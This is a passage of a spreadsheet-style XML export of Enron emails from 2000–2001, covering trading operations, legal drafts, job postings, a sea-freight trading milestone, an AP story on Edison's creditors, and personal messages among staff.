To: David W Delainey/HOU/ECT@ECT_x000D_
cc: =20_x000D_
Subject: Great words_x000D_
_x000D_
_x000D_
David, =20_x000D_
_x000D_
I hope all is well.  I had another good week at pulp and paper.  As you kno=_x000D_
w=20_x000D_
I have an affinity for technology trading.  I thought you would enjoy the=_x000D_
=20_x000D_
fine words below as you start a new week. =20_x000D_
_x000D_
Time is your most precious possession-and the hands of time move swiftly=20_x000D_
onward.  Fasten this warning deep into your mind, not for sorrow=01,s sake,=_x000D_
 but=20_x000D_
to remind yourself that today may be all you have.  Now is the time for you=_x000D_
=20_x000D_
to move forward. Now is the time for you to stand and be counted.  The grou=_x000D_
nd=20_x000D_
is now ready for you to plant the seeds of a new vision, one that will bear=_x000D_
=20_x000D_
only the finest fruit.  It is time to focus on what you want, to turn dream=_x000D_
s=20_x000D_
into realities so that you are able to spend your life in the manner in whi=_x000D_
ch=20_x000D_
you desire.  It is later than you think.    Too many of us waste our years=_x000D_
=20_x000D_
waiting for better times in the future or reflecting upon better times in t=_x000D_
he=20_x000D_
past, instead of working for better times in the present.  --------------- =_x000D_
If=20_x000D_
only we had better schooling, better opportunities, or better resources.=20_x000D_
If,if,if!  Tomorrow, tomorrow, tomorrow! =20_x000D_
-------------------------------------_x000D_
_x000D_
Today is always here; yesterday is gone; and tomorrow never comes.  Time=20_x000D_
offers opportunity but demands a sense of urgency.  Now is the time.  This =_x000D_
is=20_x000D_
the place.  You are the one!_x000D_
_x000D_
Those who leave a legacy of achievement master the art of living in the now=_x000D_
-=20_x000D_
the ability to make each moment count.  Here are their tips._x000D_
_x000D_
? First, they accept each moment as a gift to be received with joy._x000D_
? Second, they use each moment to maximum advantage._x000D_
? Third, they are bent on making a contribution to humanity._x000D_
? Fourth, they learn from their mistakes._x000D_
? Fifth, they concentrate on the task at hand._x000D_
? Sixth, they plan for the future rather than fretting over the past._x000D_
? Seventh, they simply refuse to allow the weight of an unpleasant=20_x000D_
circumstance to encumber their thoughts or objectives._x000D_
_x000D_
                                                                           =_x000D_
  =20_x000D_
               Dennis P. Kimbroa_x000D_
_x000D_
I think technology is made up of a number of tradable commodities.  These=_x000D_
=20_x000D_
commodities are volatile and trading them will add value to ENA.  I would=_x000D_
=20_x000D_
like the opportunity to create this group._x000D_
_x000D_
Best wishes,_x000D_
_x000D_
M. A. Moulton=20_x000D_
</t>
  </si>
  <si>
    <t>Thu, 19 Apr 2001 10:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>We are short 7 mw PV LLH</t>
  </si>
  <si>
    <t>The original schedule was 50 MW's TEP GEN @PV(EPE XCHANGE) - EPMI - _x000D_
SRP-MIRANT-CISO(T)PVD/SP15.  Mirant was cut by the CISO 3 mw HE 6, and 4 mw _x000D_
HE 24.  Please refer to Mirant tag #3205 for this revised schedule.   Mirant _x000D_
is sending the schedule real time.   I spoke with TEP and they are aware of _x000D_
the change.   _x000D_
_x000D_
Thanks _x000D_
Stacy</t>
  </si>
  <si>
    <t>Thu, 31 May 2001 12:15:42 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'career.management.center@anderson.ucla.edu'})</t>
  </si>
  <si>
    <t>frozenset({'alumnijobs@anderson.ucla.edu'})</t>
  </si>
  <si>
    <t>Various opportunities with Samil Accounting Corporation, Korea.</t>
  </si>
  <si>
    <t>Dear Alumni,_x000D_
_x000D_
This is a unique opportunity with Samil Accounting_x000D_
Corporation (Korean Network Firm of_x000D_
PricewaterhouseCoopers)in Seoul.  Various opportunities are_x000D_
available in their Financial Advisory Services Group (FAS)._x000D_
To apply please contact Peter SH Kahng or Sookeun Pak._x000D_
Contact information listed following description._x000D_
_x000D_
Thank you,_x000D_
Lorie_x000D_
_x000D_
_x000D_
============================_x000D_
My name is Sookeun Pak, Partner of Samil Accounting_x000D_
Corporation (Korean Network Firm of PricewaterhouseCoopers)_x000D_
and Group Leader of the Financial Advisory Services Group_x000D_
(FAS).  I am pleased to have this opportunity to write to_x000D_
you in regards to new job openings at our firm.  The FAS_x000D_
Group is seeking to recruit qualified MBA graduates as_x000D_
detailed below from respective institutions such as yours._x000D_
_x000D_
  Samil Accounting Corporation is the biggest professional firm in Korea_x000D_
  with 1,800 professionals and accountants.  The firm has been expanding_x000D_
  its business to total business solution including Management Consulting_x000D_
  Services and Financial Advisory Services.  For further information please_x000D_
  refer to our web site at www.samil.co.kr._x000D_
_x000D_
_x000D_
_x000D_
 Contact:_x000D_
 Peter SH Kahng_x000D_
 Sookeun Pak_x000D_
_x000D_
Openings:_x000D_
  Corporate Finance &amp; Recovery Group_x000D_
  Business Recovery Services (BRS)_x000D_
  Corporate Finance and Investment Banking (CF&amp;IB)_x000D_
  Corporate Value Consulting (CVC)_x000D_
  Project Finance &amp; Privatization (PF&amp;P)_x000D_
  Dispute Analysis &amp; Investigation (DA&amp;I)_x000D_
_x000D_
  Location_x000D_
  Seoul_x000D_
_x000D_
  Years of Experience_x000D_
  Different per position_x000D_
_x000D_
  Education_x000D_
  MBA, CFA, or CPA Preferred_x000D_
_x000D_
  Language Skill_x000D_
  Korean and English bilingual Preferred_x000D_
_x000D_
  Time of Recruiting_x000D_
  Through the year_x000D_
_x000D_
  Positions open_x000D_
  All positions, Full time_x000D_
_x000D_
  Contact Email_x000D_
  Shkahng@samil.co.kr_x000D_
  Skpak@samil.co.kr_x000D_
_x000D_
__________________________________________________x000D_
MBA Career Management Center_x000D_
The Anderson School at UCLA_x000D_
Entrepreneurs Hall, C201_x000D_
Phone: (310) 825-3325_x000D_
Email: career.management.center@anderson.ucla.edu_x000D_
Web: http://www.anderson.ucla.edu</t>
  </si>
  <si>
    <t>Wed, 21 Nov 2001 10:15:50 -0800 (PST)</t>
  </si>
  <si>
    <t>i think i could_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Wednesday, November 21, 2001 12:14 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	_x000D_
_x000D_
see, you couldn't handle me.  i am a freak!!  :)</t>
  </si>
  <si>
    <t>Fri, 13 Oct 2000 05:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'debbielatham@uswest.net'})</t>
  </si>
  <si>
    <t>i have to be here on the 26th.  i don't think we get that day off.  if we do _x000D_
have the day off  i can do whatever.  they guy i trade the northwest is going _x000D_
to be out of town, that is why i have to be here.</t>
  </si>
  <si>
    <t>Wed, 14 Mar 2001 03:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'louis.martinez@compaq.com'})</t>
  </si>
  <si>
    <t>frozenset({'smarrs@gowaninc.com', 'jim.schwieger@enron.com', 'mgranbe@us.ibm.com', 'brad@drillmax.com', 'david.peterson@ndequality.com', 'michael@moodyrambin.com', 'jzysk@compuserve.com'})</t>
  </si>
  <si>
    <t>FW: CFSA NIT - volunteers</t>
  </si>
  <si>
    <t>Coaches,_x000D_
_x000D_
As you can see we are still in need of the volunteers for this years_x000D_
tournament.  Please respond to me ASAP with the three names choices of your_x000D_
volunteers.  Thanks,_x000D_
_x000D_
Louis Martinez_x000D_
_x000D_
_x000D_
Hi everyone,_x000D_
_x000D_
Well I have volunteered to schedule all the volunteers for the NIT_x000D_
tournament. I drafted Ashley Wagner to help with this task.  I need all the_x000D_
School Commissioners to contact your coaches and ask them to email me their_x000D_
3 volunteers asap.  If they do not have email access would you please get_x000D_
the names and email them to me? Those of you who have the names and have_x000D_
just been waiting to find out what to do with them, now can unload them on_x000D_
me._x000D_
_x000D_
Ashley Wagner and myself will start calling them (so please include a phone_x000D_
number!) to see when they would like to work.  The first names we get will_x000D_
be the first we call so they will get the best choice of fields and times._x000D_
So do them a favor and get them in soon!!!_x000D_
_x000D_
Thanks for your help on this._x000D_
_x000D_
Tammie Self_x000D_
(281)955-5031</t>
  </si>
  <si>
    <t>Wed, 6 Jun 2001 04:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'people@venturewire.com'})</t>
  </si>
  <si>
    <t>VentureWire People, Wednesday,  June 6, 2001</t>
  </si>
  <si>
    <t xml:space="preserve">VentureWire PeopleA:link {text-decoration:none; color: black;} A:visited _x000D_
{text-decoration:none; color: black;} A:hover {text-decoration:none; _x000D_
color:#006699;} </t>
  </si>
  <si>
    <t>Thu, 16 Nov 2000 03:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'david_aamodt@pgn.com'})</t>
  </si>
  <si>
    <t>Draft Responses to CPUC subpoena on behalf of Portland General</t>
  </si>
  <si>
    <t>Dave,_x000D_
_x000D_
Attached for your review is a draft of Portland General's objections and_x000D_
responses to the CPUC subpoena.  Please let me know if you have any_x000D_
questions or comments._x000D_
_x000D_
 &lt;&lt;38KRY01!.DOC&gt;&gt;_x000D_
Peter P. Meringolo_x000D_
Brobeck, Phleger &amp; Harrison LLP_x000D_
Spear Tower_x000D_
One Market_x000D_
San Francisco, CA 94105_x000D_
Main:  (415) 442-0900_x000D_
Direct:  (415) 442-1285_x000D_
Fax:  (415) 442-1010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38KRY01!.DOC</t>
  </si>
  <si>
    <t>Thu, 22 Feb 2001 08:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Revised 7EA Turbine Letter Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Carolyn,_x000D_
_x000D_
Is this the most current version?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 02/22/2001 04:08 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Campbell, Carolyn" &lt;CCampbell@KSLAW.com&gt; on 01/11/2001 06:29:24 PM_x000D_
To: "'kay.mann@enron.com'" &lt;kay.mann@enron.com&gt;_x000D_
cc: "'ben.f.jacoby@enron.com'" &lt;ben.f.jacoby@enron.com&gt;, _x000D_
"'fred.mitro@enron.com'" &lt;fred.mitro@enron.com&gt; _x000D_
_x000D_
Subject: Revised 7EA Turbine Letter Agreement_x000D_
_x000D_
_x000D_
 &lt;&lt;2RZ504!.DOC&gt;&gt;  &lt;&lt;2RZ5RED.DOC&gt;&gt;_x000D_
_x000D_
Kay:_x000D_
_x000D_
We have enclosed clean and marked copies of a revised draft of the 7EA_x000D_
turbine letter agreement reflecting revisions from the draft previously_x000D_
distributed on January 8, 2001.  Please review and advise of any comments._x000D_
Thank you._x000D_
_x000D_
Carolyn M. Campbell_x000D_
King &amp; Spalding_x000D_
713-276-7307 (phone)_x000D_
713-751-3280 (fax)_x000D_
ccampbell@kslaw.com_x000D_
_x000D_
Enclosures: 129569v4_x000D_
  129569vR4/3_x000D_
_x000D_
 - 2RZ504!.DOC_x000D_
 - 2RZ5RED.DOC_x000D_
</t>
  </si>
  <si>
    <t>Thu, 18 Oct 2001 07:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mary.fischer@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'lara.wright@bakerhughes.com', 'carl.fischer@ukakzonobel.com', 'debbieg@gddcpa.com', 'jeff.barnett@bakerhughes.com'})</t>
  </si>
  <si>
    <t>FW: Letter to Osama</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
-----Original Message-----_x000D_
From: Ng, Mark _x000D_
Sent: Wednesday, October 17, 2001 4:56 PM_x000D_
To: Guerra, Ricardo; Kacal, Lynna; Orellana, Richard; Jon, Amy; Ashton,_x000D_
Kathleen; Caminos, Facundo; Fischer, Mary; Gao, Song; Li, Ling;_x000D_
Mathew-Joy, Noveena; Merritt, Michelle; Nugent, Caroline; Ramsey,_x000D_
Darren; Reyna, Selma; Richards, Todd; Swafford, John; Zhang, Judy_x000D_
Subject: FW: Letter to Osama_x000D_
_x000D_
_x000D_
Now that's how you write a letter!</t>
  </si>
  <si>
    <t>Mon, 9 Oct 2000 09:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rachel.m.bonilla@ac.com'})</t>
  </si>
  <si>
    <t>Re: hotel</t>
  </si>
  <si>
    <t xml:space="preserve">It was good to talk to you live.  I miss our chats, but this is the wrong _x000D_
time and place to discuss that.  Please do not fret at all about not asking _x000D_
me to stand up.  For what it is worth I didn't ask you either.  I think you _x000D_
are correct it would have been akward for both of us.  This week is a time _x000D_
when you need as little stress as possible to cope with al the people that _x000D_
are pulling at you.  So you know, do not worry about us, we are there to _x000D_
celebrate with you and meet your family.  Take care of the other high _x000D_
maintenance people, because you will be suprised how many there are.  Try and _x000D_
relax and enjoy it.  I am looking forward to seeing you in that dress.  See _x000D_
you soon._x000D_
PL_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
rachel.m.bonilla@ac.com on 10/09/2000 03:28:50 PM_x000D_
To: Phillip.M.Love@enron.com_x000D_
cc:  _x000D_
Subject: Re: hotel_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Hey Phillip, I am in the office now...but will be leaving soon and will not_x000D_
be working the rest of the week.  We should chat live.  But...as for as_x000D_
Friday goes...I am giving each room a guest box.  And in the box is a_x000D_
map/tour guide of things you can do.  The luncheon....well, other than my_x000D_
brother (and not totally sure he is coming...but will know tonight) you are_x000D_
the only guy invited...and Ashely of course.  If you were a girl (which I_x000D_
am happy you are not) you would be in my wedding party....and the lunch is_x000D_
a way to say thanks to those close to me.  If you and Ashley can't come b/c_x000D_
Grandma, etc....I totally understand.  Please do not feel obligated.  But,_x000D_
can you please let me know...I have to give the restaurant a head count.  I_x000D_
am still working on Thursday night.  BUT....worst case...check with the_x000D_
front desk.  I will leave where we are, or what the plans are if in fact I_x000D_
am not there.  I'll try and call you tonight.  OK..I am not nervous...but I_x000D_
am losing my mind right now!!  Too many things to do!!!  Anyhow...did want_x000D_
to let you know that I really thought about having you in Jason's wedding_x000D_
party....but then thought it might not be the most appropriate.  Might have_x000D_
been a little weird.  Just wanted to let you know that I did think about_x000D_
you._x000D_
_x000D_
Rach_x000D_
_x000D_
Rachel M. Bonilla_x000D_
Andersen Consulting_x000D_
North American C&amp;HT_x000D_
Denver - Octel 359/6017 - Direct Dial (720) 359-6017_x000D_
rachel.m.bonilla@ac.com_x000D_
_x000D_
_x000D_
_x000D_
            Phillip.M.Love@enron.c_x000D_
            om                            To:     Rachel M. Bonilla@Andersen _x000D_
Consulting_x000D_
                                          cc:_x000D_
            10/09/2000 08:39 AM           Subject:     Re: hotel_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
I don't know if you are working any this week, but I will send an email any_x000D_
way.  We were wondering what there might be to do in Denver on Friday?_x000D_
Since we have all day, are there musuems or things unique to Denver to see?_x000D_
I know there is some luncheon on Friday, is that for couples or just girls?_x000D_
Wasn't really sure.  We get in about we land on Thursday at 5 p.m. and her_x000D_
grandmother lands at 6 p.m. so we should be at the hotel by around 6:45._x000D_
Should we call your room or meet you somewhere?  Talk to you soon._x000D_
PL_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 20 Oct 2000 09:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kss@overlandpartners.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Unfortunately I can't go to Austin next weekend; I've planned to go to L.A. _x000D_
to visit Sue.  I am bringing my new beau with me!  You will meet Craig at _x000D_
some point.  I think it's also safe to say you will like him much better than _x000D_
Bill._x000D_
I'm tentatively planning to come to Austin the weekend of Nov. 11, but you _x000D_
know that is totally up to D.E. (Dreamy Eric)._x000D_
In the meantime, send Bug photos if possible!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Shelton, Karin" &lt;kss@overlandpartners.com&gt; on 10/20/2000 04:06:55 PM_x000D_
To: "'susan.scott@enron.com'" &lt;susan.scott@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Austin_x000D_
_x000D_
_x000D_
Hola and happy Friday! Just a note to let you know that we will be going to_x000D_
Austin next weekend for wig control.  Might you be able to join us there?_x000D_
Jim left this morning with Dave to go to Zion.  It will be a good male_x000D_
bonding kind of trip I guess.  Dave and Sandy (excuse me, David and_x000D_
Sandra...)are expecting a baby in December so it will kind of be a "last_x000D_
hurrah" for him, I guess! Anyway, mum is going to help me with bug duty this_x000D_
weekend for which I am most thankful.  Now I can get at least be assured of_x000D_
getting the routine cleaning done.  Well, let me know if you can make it to_x000D_
Austin next weekend, otay?_x000D_
_x000D_
Karin_x000D_
_x000D_
The information in this e-mail is confidential and may be legally_x000D_
privileged.  It is intended solely for the addressee.  Access by any other_x000D_
person to this e-mail is not authorized.  If you are not the intended_x000D_
recipient, please delete this e-mail.  Any disclosure of this e-mail or of_x000D_
the parties to it, any copying, distribution or any action taken or omitted_x000D_
to be taken in reliance on it is prohibited, and may be unlawful._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 29 Nov 2001 13:00:14 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jbass@stdauto.com'})</t>
  </si>
  <si>
    <t>Phone Number</t>
  </si>
  <si>
    <t>I don't have your work #.  What is it?</t>
  </si>
  <si>
    <t>Mon, 7 Aug 2000 01:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Sea freight: 1st trade done today</t>
  </si>
  <si>
    <t xml:space="preserve">As info. _x000D_
 We are working to keep the bid / ask spreads as narrow as possible for each _x000D_
of our EOL markets - domestic and international coal, vessel freights and _x000D_
emissions.  Volumes for coal and emissions are already up, and freight should _x000D_
be a rapidly developing market._x000D_
_x000D_
_x000D_
---------------------- Forwarded by George McClellan/HOU/ECT on 08/07/2000 _x000D_
08:40 AM ---------------------------_x000D_
_x000D_
_x000D_
John Sherriff_x000D_
08/04/2000 10:39 AM_x000D_
To: Pierre Aury/LON/ECT@ECT_x000D_
cc: George McClellan/HOU/ECT@ECT, Stuart Staley/LON/ECT@ECT, Chris _x000D_
Connelly/LON/ECT@ECT _x000D_
Subject: Re: Sea freight: 1st trade done today  _x000D_
_x000D_
Pierre_x000D_
_x000D_
Congratulations - this is a fabulous market for us to work._x000D_
_x000D_
John_x000D_
_x000D_
_x000D_
   _x000D_
_x000D_
_x000D_
	Enron Europe_x000D_
	_x000D_
	From:  Pierre Aury                           04/08/2000 14:08_x000D_
	_x000D_
_x000D_
To: John Sherriff/LON/ECT@ECT_x000D_
cc: George McClellan/HOU/ECT@ECT, Stuart Staley/LON/ECT@ECT, Chris _x000D_
Connelly/LON/ECT@ECT _x000D_
_x000D_
Subject: Sea freight: 1st trade done today_x000D_
_x000D_
hello John_x000D_
we started to work on the idea of putting freight swaps on eol during fh may. _x000D_
we were ready technically early july, cleared all legal hurdles end july, _x000D_
went live on the 1st of august and did our first trade today . and guess what _x000D_
the customer is so enthusiastic that he ll make us great advertisement . this _x000D_
is the first time ever a shipping transaction has  been made principal to _x000D_
principal 100pct  through an electronic media._x000D_
fyg we are quoting 2 contracts based on cape size vessels (cargo size 150 000 _x000D_
tons ) on coal routes . one is south africa to rotterdam and the other one is _x000D_
colombia to rotterdam. these routes are  the main routes of the international _x000D_
coal group portfolio. _x000D_
in terms of volume what we are putting on eol every day is more than what is _x000D_
contracted on the normal otc market on a monthly basis._x000D_
in terms of spreads existing otc market is working with 0.75 to 1 usd  when _x000D_
our spread is now 0.20 usd._x000D_
_x000D_
in september/october  we will increase the number of contracts available to _x000D_
include smaller vessels and other types transaction (time charter in addition _x000D_
to the present contract which are "voyage" type transactions) _x000D_
._x000D_
pierre aury _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
--------------------- Forwarded by Pierre Aury/LON/ECT on 04/08/2000 13:44 _x000D_
---------------------------_x000D_
   _x000D_
_x000D_
_x000D_
	Enron Europe_x000D_
	_x000D_
	From:  Chris Connelly                           04/08/2000 11:44_x000D_
	_x000D_
_x000D_
To: Enron London - EOL Product Control Group/LON/ECT@ECT_x000D_
cc: Louise Kitchen/HOU/ECT@ECT, David Forster/Corp/Enron@Enron, Stuart _x000D_
Staley/LON/ECT@ECT, George McClellan/HOU/ECT@ECT, Nick Mooney/LON/ECT@ECT _x000D_
(bcc: Pierre Aury/LON/ECT)_x000D_
_x000D_
Subject: Sea freight: 1st trade done today_x000D_
_x000D_
Fyi,_x000D_
_x000D_
We have just traded our first sea freight contract today with Bocimar BV as _x000D_
the counterpart.  Bocimar is the biggest Cape size vessel operator in the _x000D_
world and they called after the trade to let me know that they think the _x000D_
system is great and will be using it to trade regularly._x000D_
_x000D_
Regards_x000D_
_x000D_
_x000D_
Chris Connelly_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 16 Mar 2001 01:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jsteffe@enron.com', 'mary.hain@enron.com', 'gfergus@brobeck.com', 'sbishop@gibbs-bruns.com', 'smara@enron.com', 'rsanders@enron.com'})</t>
  </si>
  <si>
    <t>Fwd: AP - Edison Creditor Secures Plant Lien</t>
  </si>
  <si>
    <t xml:space="preserve">Content-Transfer-Encoding: quoted-printable_x000D_
Date: Fri, 16 Mar 2001 09:01:51 -0600_x000D_
From: "Tracey Bradley" &lt;tbradley@bracepatt.com&gt;_x000D_
To: "Paul Fox" &lt;pfox@bracepatt.com&gt;_x000D_
Cc: "Alfredo Perez" &lt;aperez@bracepatt.com&gt;, "Jeffrey Watkiss" _x000D_
&lt;dwatkiss@bracepatt.com&gt;, "Mark Evans" &lt;mevans@bracepatt.com&gt;, "Ronald _x000D_
Carroll" &lt;rcarroll@bracepatt.com&gt;_x000D_
Subject: AP - Edison Creditor Secures Plant Lien_x000D_
Mime-Version: 1.0_x000D_
Content-Type: text/plain; charset=US-ASCII_x000D_
Content-Disposition: inline_x000D_
_x000D_
Thursday March 15, 9:14 pm Eastern Time_x000D_
_x000D_
Edison Creditor Secures Plant Lien_x000D_
_x000D_
By LESLIE GORNSTEIN_x000D_
AP Business Writer_x000D_
_x000D_
LOS ANGELES (AP) -- Breaking away from a pack of creditors owed billions by _x000D_
Southern California Edison, Caithness Energy got permission Wednesday to _x000D_
secure a lien against one of the utility's plants._x000D_
_x000D_
The judgment lets the New York-based electricity supplier to attach a partial _x000D_
claim on an Edison facility in Laughlin, Nev. -- a move that could spur _x000D_
bigger creditors to launch similarly aggressive approaches or even force _x000D_
Edison into bankruptcy._x000D_
_x000D_
Caithness, which has two Nevada plants owed $20 million by Edison, was _x000D_
allowed to attach the lien by U.S. District Judge Lloyd George of Las Vegas._x000D_
_x000D_
Once it becomes final in the next few days, the claim will be the first lien _x000D_
successfully placed against an Edison asset since California's energy crisis _x000D_
began last year._x000D_
_x000D_
An Edison spokesman said the utility will seek a stay of the order next week._x000D_
_x000D_
A lien allows a creditor a better chance of getting paid by laying claim to _x000D_
all or a portion of any future sale of a property. The judge allowed _x000D_
Caithness to file for a 56 percent interest in the plant, which employs 309 _x000D_
people and is valued at $530 million._x000D_
_x000D_
The energy was used by Edison to feed California's energy grid, Caithness _x000D_
attorney Philip Korologos said Thursday._x000D_
_x000D_
Edison owes Caithness a total of $100 million, and another $20 million bill _x000D_
will come due at the end of March, Korologos said._x000D_
_x000D_
``They took delivery of the power and they are supposed to pay us for the _x000D_
power,'' Korologos said._x000D_
_x000D_
But whether Caithness will go after Edison's California assets is far from _x000D_
certain. Korologos said he believed that some form of additional mediation is _x000D_
required for California liens that might make such an option less attractive _x000D_
in the utility's home state._x000D_
_x000D_
Edison's bigger creditors, including Reliant Energy of Houston, declined to _x000D_
speculate on whether they will employ a similar tactic._x000D_
_x000D_
But industry experts said that the Caithness move could cause other, bigger _x000D_
creditors to feel pressure to act more aggressively on behalf of _x000D_
shareholders. The law requires only three major creditors to band together to _x000D_
force Edison into involuntary bankruptcy; the utility has said it does not _x000D_
intend to file on its own._x000D_
_x000D_
So far, most creditors have chosen to simply wait, or ``forbear,'' on the _x000D_
Edison debts, having fielded repeated pleas by Edison to do so. At least four _x000D_
creditors or groups of creditors have sued the utility for money owed but _x000D_
have taken no further action._x000D_
_x000D_
A New York-based creditor last month unsuccessfully tried to attach a lien to _x000D_
an Edison bank account without success, an Edison spokesman said._x000D_
_x000D_
Edison's problems began last year when, under California's 1996 deregulation _x000D_
law, investor-owned utilities were forced to buy power on the soaring spot _x000D_
market while limiting the rates they could charge consumers._x000D_
_x000D_
Edison and fellow utility Pacific Gas &amp; Electric say they owe creditors a _x000D_
combined $14 billion._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 23 May 2000 11:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'napedersen@jonesday.com'})</t>
  </si>
  <si>
    <t>Witness List</t>
  </si>
  <si>
    <t>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In accordance with paragraph 4 of your Ruling dated April 26, 2000 the_x000D_
supporters of the Post-Interim Settlement  provide the following witness_x000D_
list: Michel Peter Florio, James Weil, and Catherine E. Yap.  The prepared_x000D_
direct testimony of these witnesses has been premarked as Exhibit 101.  The_x000D_
prepared rebuttal testimony of these witnesses has been premarked as_x000D_
Exhibit 102.</t>
  </si>
  <si>
    <t>Tue, 4 Jan 2000 10:04:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: new PULPEX document needed for trading in London</t>
  </si>
  <si>
    <t xml:space="preserve">I see what you mean.  Another thing we need to consider is whether or not _x000D_
this is part of our market maker status for the exchange - do you know if  _x000D_
Bob wants Steve's activities in London to be part of that?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mark Elliott_x000D_
01/04/2000 11:41 AM_x000D_
To: Mark Taylor/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: new PULPEX document needed for trading in London  _x000D_
_x000D_
Mark_x000D_
_x000D_
Thanks for your message.  Apparently, EEFT is the Member of IPE as a _x000D_
principal - but always acts through brokers when placing orders for ECTRIC _x000D_
(i.e., never places orders itself on the Exchange).  I'm not sure that Bob _x000D_
would want to have Steve place orders through brokers for ECTRIC rather than _x000D_
being able to trade on the Exchange himself.  I'll know more once I chat to _x000D_
the Exchange about the potential ways forward._x000D_
_x000D_
Kind regards_x000D_
_x000D_
Mark_x000D_
_x000D_
_x000D_
To: Mark Elliott/LON/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Re: new PULPEX document needed for trading in London  _x000D_
_x000D_
Mark,_x000D_
_x000D_
You might want to check with Paul on this.  How have we arranged our IPE _x000D_
trading?  Since we are talking about exchange-traded contracts here, not _x000D_
dealing with customers, it may be possible to use an entity other than EEFT.  _x000D_
_x000D_
Hope all is well._x000D_
_x000D_
Mark_x000D_
_x000D_
_x000D_
_x000D_
Mark Elliott_x000D_
01/04/2000 07:56 AM_x000D_
To: Bob Crane/HOU/ECT@ECT_x000D_
cc: Mark Taylor/HOU/ECT@ECT, Steve Kim/HOU/ECT@ECT _x000D_
Subject: Re: new PULPEX document needed for trading in London  _x000D_
_x000D_
Bob,_x000D_
_x000D_
Apologies for not having got back to you sooner but I have only today _x000D_
returned from two weeks holiday to find your e-mail awaiting me!_x000D_
_x000D_
Anyway, I have already put in a call to Derek Oliver (whom I know quite well, _x000D_
having negotiated the legal documentation for our first Pulpex application) _x000D_
to be told that he is out of the office but that he will return my call._x000D_
_x000D_
My initial thoughts, however, - and the main reason why I need to speak to _x000D_
Derek - is that, as you know, all financially-settled derivatives are (for _x000D_
regulatory reasons) arranged in London by Enron Europe Finance &amp; Trading _x000D_
Limited (EEFT) (rather than Enron Europe), which arranges deals for ECTRIC.  _x000D_
I am unsure without speaking to Derek whether the Exchange will allow for _x000D_
EEFT to be a member of the Exchange as an agent (rather than as a principal) _x000D_
for ECTRIC.  EEFT never enters into deals itself as principal, and ECTRIC can _x000D_
only entre into deals via EEFT.  _x000D_
_x000D_
Anyway, let me have a word with Derek and see what we can come up with._x000D_
_x000D_
I shall be in touch as soon as I have spoken to Derek._x000D_
_x000D_
Kind regards and happy New Year,_x000D_
_x000D_
Mark       _x000D_
_x000D_
_x000D_
_x000D_
Bob Crane_x000D_
21/12/99 15:52_x000D_
To: Mark Elliott/LON/ECT@ECT_x000D_
cc: Mark Taylor/HOU/ECT@ECT, Steve Kim/HOU/ECT@ECT _x000D_
_x000D_
Subject: new PULPEX document needed for trading in London_x000D_
_x000D_
Mark,_x000D_
_x000D_
Steve Kim has been working with me in Houston where one of his roles is _x000D_
PULPEX trading on a day-to-day basis.  He will be moving to London in late _x000D_
January to assist in our European marketing efforts.  I would like him to be _x000D_
able to trade PULPEX from London when he is not on customer calls.  My intent _x000D_
is the account would remain with Enron North America and Steve would trade as _x000D_
a back-up when no one is available in the US.  I have spoken with PULPEX _x000D_
about this and their legal department wants us to organize it where:_x000D_
_x000D_
 Enron Europe would be a member of the exchange_x000D_
 There would be a give-up agreement between ECTRIC and ENA where trades _x000D_
executed by Europe would automatically be transferred into ENA's _x000D_
  accounts_x000D_
_x000D_
The exchange thinks this should be easy to set up from a legal perspective _x000D_
and Derick Oliver at 171 815 8502 to initiate the necessary docs.  Please let _x000D_
me know what you think._x000D_
_x000D_
Regards,_x000D_
_x000D_
Bob Crane _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 1 Feb 2001 03:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'steven.south@enron.com'})</t>
  </si>
  <si>
    <t>Re: Price Missing</t>
  </si>
  <si>
    <t>I agree with bc gas  on deal 470448 I have changed  it in sitara</t>
  </si>
  <si>
    <t>Tue, 14 Nov 2000 06:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'baughmanpatricia@hotmail.com'})</t>
  </si>
  <si>
